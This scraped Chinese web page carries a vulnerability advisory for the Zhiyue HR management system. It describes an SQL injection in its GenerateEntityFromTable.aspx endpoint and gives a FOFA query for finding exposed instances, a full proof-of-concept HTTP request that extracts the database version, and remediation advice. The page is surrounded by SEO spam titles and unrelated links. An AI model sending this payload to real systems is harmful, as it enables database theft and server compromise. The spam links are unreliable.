当前位置: 首页 > news >正文

绍兴网站制作工具莱芜搬家公司电话

绍兴网站制作工具,莱芜搬家公司电话,广州网站开发 英诺科技,php企业网站开发实训报告0x01 产品简介 智跃人力资源管理系统是基于B/S网页端广域网平台#xff0c;一套考勤系统即可对全国各地多个分公司进行统一管控#xff0c;成本更低。信息共享更快。跨平台#xff0c;跨电子设备 0x02 漏洞概述 智跃人力资源管理系统GenerateEntityFromTable.aspx接口处存在…0x01 产品简介 智跃人力资源管理系统是基于B/S网页端广域网平台一套考勤系统即可对全国各地多个分公司进行统一管控成本更低。信息共享更快。跨平台跨电子设备 0x02 漏洞概述 智跃人力资源管理系统GenerateEntityFromTable.aspx接口处存在SQL注入漏洞攻击者可通过该漏洞获取数据库中的信息例如管理员后台密码、站点的用户个人信息之外甚至在高权限的情况可向服务器中写入木马进一步获取服务器系统权限。 0x03 复现环境 FOFAappZY-人力资源管理系统 0x04 漏洞复现  PoC GET /resource/utils/GenerateEntityFromTable.aspx?t1%27%2B(SELECT%20CHAR(103)%2BCHAR(87)%2BCHAR(114)%2BCHAR(112)%20WHERE%201669%3D1669%20AND%206492%20IN%20(selectversion))%2B%27 HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip 查询数据库版本 0x05 修复建议  官方暂已修复该漏洞请用户联系厂商修复漏洞http://www.zyehr.com 部署Web应用防火墙对数据库操作进行监控。 如非必要禁止公网访问该系统。
http://wiki.neutronadmin.com/news/210595/

相关文章:

  • 娱乐网站制作企业网站做的好的有什么公司
  • 广州积分入学网站注册公司流程及步骤
  • 用php做电商网站有哪些成都网站备案
  • 网站建设经费管理php企业网站系统
  • 网站建设数据库怎么传送网站制作 杭州公司
  • 软件开发和网站建设那个好区块链app制作教程
  • 怎么上传网站仙居住房和城乡建设局网站
  • 广州网站建设哪好买个天猫店多少钱一个
  • 九江企业网站的建设WordPress站内跳转设置
  • 网站建设书本打电话沟通做网站
  • 官方网站建设 磐石网络多少费用wordpress免费简约主题下载
  • 聊网站推广河源东源新闻最新消息
  • 天津手机版建站系统哪个好比较好看的网站设计
  • 网站开发和设计区别网站开发专业 工作意愿
  • 近期做网站需要什么软件申请微信小程序流程
  • 2021建站做相册集什么网站
  • 哪里有做证seo综合查询平台官网
  • 网站个人信息页面布局南昌网站做
  • 济南做网站那家好网页设计图片素材小插件
  • 一般网站后台地址赣州营销网站建设
  • 有关做有机肥的企业网站wordpress织梦扩展
  • 企业网站开发网站做端口是什么情况
  • 网站建设类的计入什么科目优秀个人网页设计案例分析
  • 竹子建站怎么样rpc wordpress
  • 如何免费注册一个网站网页编辑器安卓
  • 旅游网站手机模板网络建设推广
  • jp域名网站排名seo培训
  • 网站报名系统怎么做如果做微商需不需要开个网站。
  • 旅游商城网站订单处理厦门住建局
  • 南京 网站制作公司哪家好网上销售方法